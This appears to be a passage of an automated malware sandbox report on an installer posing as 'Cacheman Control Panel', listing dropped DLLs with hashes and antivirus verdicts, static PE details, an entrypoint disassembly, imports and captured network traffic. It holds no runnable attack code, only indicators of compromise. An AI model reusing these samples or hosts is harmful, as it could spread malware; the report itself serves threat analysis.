                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........&......0.........Da....................................-......... ......................................P.......`............... ..................d...............................(....................a...............................text...............................`.P`.data...............................@.P..rdata..............................@.`@.pdata....... ......................@.0@.xdata.......0......................@.0@.bss....@....@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X....p.......$..............@.@..tls.................&..............@.@..reloc..d............(..............@.0B........................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):72704
                                                      Entropy (8bit):6.202479833405588
                                                      Encrypted:false
                                                      SSDEEP:1536:klv6q1ZwQpNmwLsBHvahLdYZPLdsWVcdyXWADttnY:eZZDNTsBHvS+VYyXWAJtnY
                                                      MD5:040352D2528DF9A7EC3B5ADCA3BAB444
                                                      SHA1:A08DBFA5D9EDC2EBA36FD0FE287E0FB1E37A7E97
                                                      SHA-256:A276F57503BAD9A4BCA17E8E057993607E715C1FA6C7D2E136A2290A19EFD560
                                                      SHA-512:B7C62EFCED3819419C539420B127C183D28FD39834DDD9ABCDC60641B3F2BC731E15543D3E53CF5F1DB06743CBE9CC74B2C03A6EBD5A7088795951E47A107CC6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 12%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Joe Sandbox View:
                                                      • Filename: kU110zA27l.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware1.14311.exe, Detection: malicious, Browse
                                                      • Filename: reawz09cwj_DOC0107210_AGOSTO.doc, Detection: malicious, Browse
                                                      Reputation:low
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H..................O...............................................................@...........Rich...........................PE..L......`...........!.........................................................`............@.............................L...\...P....@.......................P..........8...............................@...............$............................text...(........................... ..`.rdata...[.......\..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libgstcontroller-1.0-0.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                      Category:dropped
                                                      Size (bytes):76450
                                                      Entropy (8bit):5.974759649110951
                                                      Encrypted:false
                                                      SSDEEP:1536:c8p2RxGoPW5Oa6uUDsCGln6K1Ax6K//u3D5NSSG3H0SATWzC9Y0JwazM1s7f:c8p2R1HnDsbn8xt/G8SG3H0SA4C9Y0JP
                                                      MD5:8CF8B4B065BF720AE2D96DBA7B86F285
                                                      SHA1:8D0CD6B3860EE0DC23AC261814F7C2DB282F127E
                                                      SHA-256:6C6AEC02A64CAA9F868F2FDDC14F666CA4FFFD27D41010AFFD1A5826852B3D09
                                                      SHA-512:81DBECEFB5A1FCFB470D56B8358455C79970507EBFCE966590CEEE94884466C9D9034F8CE4AE9E2B6633CB796A154F5ED93C66324E3963DEC30106A6F8DC9E1C
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...........................e.....................................\........ ......................................0.......@..................|........................................... p..(....................D..`............................text...............................`.P`.data...P...........................@.P..rdata...#.......$..................@.`@.pdata..|...........................@.0@.xdata..............................@.0@.bss......... ........................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....X....`......................@.@..tls....h....p......................@.`..reloc..............................@.0B........................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libogg-0.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                      Category:dropped
                                                      Size (bytes):84559
                                                      Entropy (8bit):5.557238189374717
                                                      Encrypted:false
                                                      SSDEEP:768:RIBmX6tFu4kYOvBHwDFHs0YZqCC3m1/z0BDtZH5zhG4tZtVnDPo1SndQzJdn1W:KBmX6S4kYOvJGMRZABDflIQiMnAJd1W
                                                      MD5:87A4E5BC51A9C2533AC5308F3343A76B
                                                      SHA1:3427C4CD2F63DDB6787FBC3EE736B3B2433F0B91
                                                      SHA-256:CCCDC7C91A6AD01D2E1AF8555FBDE94787BF5EE39A61703008D0C2ED7F9E6EBE
                                                      SHA-512:0659A6407AB1B9451C79F684BE24C78FA8FFC3DE6B5DFDDE3AE90141567897001194F9849B50EF0A9643ABBCFA4F73C09254E771B0103A406DF04CC4D188359A
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....+.Y....T.....&".........<................hp.............................`................ .............................................. ..l............................P..h........................... @..(...................."...............................text...@........................... .P`.data...............................@.P..rdata..............................@.`@.pdata..............................@.0@.xdata..4...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..l.... ......................@.0..CRT....X....0......................@.@..tls....h....@......................@.`..reloc..h....P......................@.0B........................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libxml3.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):545280
                                                      Entropy (8bit):6.626107318819812
                                                      Encrypted:false
                                                      SSDEEP:12288:EJSjsd4Hd2kR6vk9YE0quvI1bi1TpD1BQwz9554Ya8Th7h:h956vk9YE0qwUwz934Ya8ThN
                                                      MD5:5AE30E4CDABB5B269B7EB358AAE2D5E2
                                                      SHA1:58AAE25BF64BD0B15BE33CEB47DDB6EF3802433A
                                                      SHA-256:0B2CABAF0B2AEF51C3396B11E604C46B65EABC0CBDE3E257BC9C9FD1C2446C6F
                                                      SHA-512:2D4A2AAD072BEBBC707AF9DCA22C54F6D9607E6F7BC8826BCB61B0321F4E0464884F4577DC51DCFB7A40A9B143CF9E26225694EF4668F629F632870D11AFA198
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 12%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......'}i.c...c...c...ww..m...ww......ww..t....h..a....h..z....n..f....h..Q....h......ww..f...c........h..a....h..b....h..b....h..b...Richc...........................PE..L......`...........!.....~................................................................@..........................I......XJ..(............................@..,N......p...................@.......`...@............................................text....}.......~.................. ..`.rdata..............................@..@.data....7...`...&...F..............@....rsrc................l..............@..@.reloc..,N...@...P..................@..B........................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\settings.xml
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):502603
                                                      Entropy (8bit):7.198074868822942
                                                      Encrypted:false
                                                      SSDEEP:3072:auYaHsoWaNGk4lwlaZLOmRE3+eanjLij/Uj5zsd+zqhCq1HmOIRAlLVLp8UDEYiF:a/EGk4lTZ9tziwYDChO2yVLatf6PM
                                                      MD5:FA4B4F1F9869DA4A0209BBA251859EFC
                                                      SHA1:FE7A4EE923D6EEB93E8A52778735120705D927A5
                                                      SHA-256:05AF99365637A46D18B5BC60D20E7CBD8943F250A15976C672B3D29EE1472D2F
                                                      SHA-512:F82EB33679935CB69BAAF3AD5EAA71DF3D750771B21B964597543D901483AAB89602F8603E474758AE6162157C06D37B36DB669086DCF31CEA7CE8D560094456
                                                      Malicious:false
                                                      Preview: .<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>System.Linq.Expressions</name>.. </assembly>.. <members>.. <member name="T:System.Linq.IOrderedQueryable">.. <summary>..........</summary>.. <filterpriority>2</filterpriority>.. </member>.. <member name="T:System.Linq.IOrderedQueryable`1">.. <summary>..........</summary>.. <typeparam name="T">................. Covariant............................................................</typeparam>.. </member>.. <member name="T:System.Linq.IQueryable">.. <summary>.........................</summary>.. <filterpriority>2</filterpriority>.. </member>.. <member name="P:System.Linq.IQueryable.ElementType">.. <summary>.....
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\vcruntime140.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):76176
                                                      Entropy (8bit):6.753729195941321
                                                      Encrypted:false
                                                      SSDEEP:1536:TpIhq3RcCBwca4EZEXNciFk+ikPC+ecbiLgavG:TpIY3RcCKcajodF4+ecbiLI
                                                      MD5:5F9D90D666620944943B0D6D1CCA1945
                                                      SHA1:08EAD2B72A4701349430D18D4A06D9343F777FA6
                                                      SHA-256:9EC4AFAD505E0A3DAD760FA5B59C66606AE54DD043C16914CF56D7006E46D375
                                                      SHA-512:BE7A2C9DAE85E425A280AF552DBD7EFD84373F780FA8472BAB9A5FF29376C3A82D9DFA1FEF32C6CF7F45BA6E389DE90E090CB579EEBFF12DCFE12E6F3E7764D1
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|R.|...|...|..%....|.......|...|...|.......|.......|.......|.......|.......|.......|..Rich.|..................PE..L...LQ^`.........."!.........................................................@............@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\zlib.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):84992
                                                      Entropy (8bit):6.496389237373976
                                                      Encrypted:false
                                                      SSDEEP:1536:hoEz8+iLbyuv7MBe0HQOsgGu5myOT94vnToIff5IOcIOY3kNFoU4Pao:Jz8zLbyG7MBeD1YOT6TBfrSYUFotx
                                                      MD5:F433B1AAB2D8F62EDFA2FD2E3686E5F0
                                                      SHA1:C06891308B99388554C745FB80E359330D8FBCED
                                                      SHA-256:193B8F5AD2B61B5850753EA83DF27EF776C5E43E041A6A984FB551CA8140A33A
                                                      SHA-512:59C85C328C25F03FBA12E22A9B31AE5461941050D808F65565A361B6BD8413BEB45852DAB31088DB23BEB5DA205D0619EF3CF3A62ED4AB7848DE1A3FD7BC20A3
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........p+...E..E..E.i...E..yD..E.6....E..yF..E..y@..E..yA..E..uD..E..D..E..yA..E..yE..E..y...E..yG..E.Rich..E.........................PE..d....}.[.........." .........t......................................................g<....`......................................... C..H...hJ.......p..0....`..................X....4...............................4..................p............................text...C........................... ..`.rdata..._.......`..................@..@.data...8....P.......8..............@....pdata.......`.......:..............@..@.rsrc...0....p.......D..............@..@.reloc..X............J..............@..B................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.934552263340282
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:dY5HmgsBm6.exe
                                                      File size:2573987
                                                      MD5:ae8f9d9b8344d52f0872dfdc852e1dd4
                                                      SHA1:7e9f4259cc193465317ee48b8428b36e74028390
                                                      SHA256:95b5d0e36464afc8391a9d056926e5859506ead18937669554bde42f7a6d135b
                                                      SHA512:27928930215dbb9217247d846c570a756b46866b17b0832c9de7c8a800e3d0457f64c28ddfb4a66372f3837695e8f1a5645804f222ac7344284facb68bc79b21
                                                      SSDEEP:49152:qFUy7w/OQkyXuS18WPu8vE2uajZ3/qUlppUAr/n7oi/dyXUETzBJi3:qFnekR+08s2uaX9tdyZTzBJi3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                      File Icon

                                                      Icon Hash:d482b0d0f0b0c2d4

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403348
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:ced282d9b261d1462772017fe2f6972b

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 0040A198h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [004080B8h]
                                                      call dword ptr [004080BCh]
                                                      and eax, BFFFFFFFh
                                                      cmp ax, 00000006h
                                                      mov dword ptr [0042F42Ch], eax
                                                      je 00007F8F94D565F3h
                                                      push ebx
                                                      call 00007F8F94D59756h
                                                      cmp eax, ebx
                                                      je 00007F8F94D565E9h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 004082A0h
                                                      push esi
                                                      call 00007F8F94D596D2h
                                                      push esi
                                                      call dword ptr [004080CCh]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007F8F94D565CDh
                                                      push 0000000Bh
                                                      call 00007F8F94D5972Ah
                                                      push 00000009h
                                                      call 00007F8F94D59723h
                                                      push 00000007h
                                                      mov dword ptr [0042F424h], eax
                                                      call 00007F8F94D59717h
                                                      cmp eax, ebx
                                                      je 00007F8F94D565F1h
                                                      push 0000001Eh
                                                      call eax
                                                      test eax, eax
                                                      je 00007F8F94D565E9h
                                                      or byte ptr [0042F42Fh], 00000040h
                                                      push ebp
                                                      call dword ptr [00408038h]
                                                      push ebx
                                                      call dword ptr [00408288h]
                                                      mov dword ptr [0042F4F8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 00429850h
                                                      call dword ptr [0040816Ch]
                                                      push 0040A188h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x351e0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .rsrc0x380000x351e00x35200False0.398745404412data5.87127264524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x383580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                      RT_ICON0x48b800xce43PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                      RT_ICON0x559c80x94a8dataEnglishUnited States
                                                      RT_ICON0x5ee700x5488dataEnglishUnited States
                                                      RT_ICON0x642f80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4278648832EnglishUnited States
                                                      RT_ICON0x685200x25a8dataEnglishUnited States
                                                      RT_ICON0x6aac80x10a8dataEnglishUnited States
                                                      RT_ICON0x6bb700x988dataEnglishUnited States
                                                      RT_ICON0x6c4f80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                      RT_DIALOG0x6c9600x100dataEnglishUnited States
                                                      RT_DIALOG0x6ca600x11cdataEnglishUnited States
                                                      RT_DIALOG0x6cb800x60dataEnglishUnited States
                                                      RT_GROUP_ICON0x6cbe00x84dataEnglishUnited States
                                                      RT_VERSION0x6cc680x238dataEnglishUnited States
                                                      RT_MANIFEST0x6cea00x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                      Version Infos

                                                      DescriptionData
                                                      LegalCopyright(c) 1995-2021 by Outertech
                                                      ProductNameCacheman Client
                                                      FileDescriptionCacheman Control Panel
                                                      FileVersion1.0.0.39
                                                      CompanyNameOutertech
                                                      Translation0x0409 0x04e4

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      04/26/21-11:49:16.348833ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.384321ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                      04/26/21-11:49:16.422134ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.457652ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                      04/26/21-11:49:16.484214ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.525271ICMP449ICMP Time-To-Live Exceeded in Transit81.95.15.57192.168.2.6
                                                      04/26/21-11:49:16.528717ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.570252ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.202192.168.2.6
                                                      04/26/21-11:49:16.570692ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.612022ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.129192.168.2.6
                                                      04/26/21-11:49:16.614361ICMP384ICMP PING192.168.2.693.184.221.240
                                                      04/26/21-11:49:16.655081ICMP408ICMP Echo Reply93.184.221.240192.168.2.6

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2021 11:50:17.326932907 CEST4974080192.168.2.645.85.90.225
                                                      Apr 26, 2021 11:50:20.335309029 CEST4974080192.168.2.645.85.90.225

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2021 11:49:07.748389959 CEST5451353192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:07.792071104 CEST6204453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:07.797130108 CEST53545138.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:07.851512909 CEST53620448.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:08.030221939 CEST6379153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:08.093974113 CEST53637918.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:08.543925047 CEST6426753192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:08.592582941 CEST53642678.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:08.621089935 CEST4944853192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:08.680793047 CEST53494488.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:09.444365978 CEST6034253192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:09.495984077 CEST53603428.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:10.384572029 CEST6134653192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:10.433298111 CEST53613468.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:11.289063931 CEST5177453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:11.346793890 CEST53517748.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:12.211963892 CEST5602353192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:12.271348953 CEST53560238.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:13.074647903 CEST5838453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:13.126473904 CEST53583848.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:14.000380039 CEST6026153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:14.051873922 CEST53602618.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:14.893923998 CEST5606153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:14.942894936 CEST53560618.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:16.199764013 CEST5833653192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:16.248863935 CEST53583368.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:16.271825075 CEST5378153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:16.320822954 CEST53537818.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:17.390217066 CEST5406453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:17.439023018 CEST53540648.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:18.622780085 CEST5281153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:18.674583912 CEST53528118.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:19.586822987 CEST5529953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:19.639607906 CEST53552998.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:20.643804073 CEST6374553192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:20.692651033 CEST53637458.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:21.459749937 CEST5005553192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:21.509036064 CEST53500558.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:22.254564047 CEST6137453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:22.305295944 CEST53613748.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:23.144468069 CEST5033953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:23.193371058 CEST53503398.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:24.021224976 CEST6330753192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:24.069824934 CEST53633078.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:42.311319113 CEST4969453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:42.359826088 CEST53496948.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:49:45.912611008 CEST5498253192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:49:45.973793983 CEST53549828.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:01.149692059 CEST5001053192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:01.281064987 CEST53500108.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:02.000463963 CEST6371853192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:02.172791958 CEST53637188.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:02.335345030 CEST6211653192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:02.386960983 CEST53621168.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:02.751641035 CEST6381653192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:02.897742987 CEST53638168.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:03.030911922 CEST5501453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:03.095846891 CEST53550148.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:03.383289099 CEST6220853192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:03.443824053 CEST53622088.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:03.990679026 CEST5757453192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:04.048022985 CEST53575748.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:04.613993883 CEST5181853192.168.2.68.8.8.8
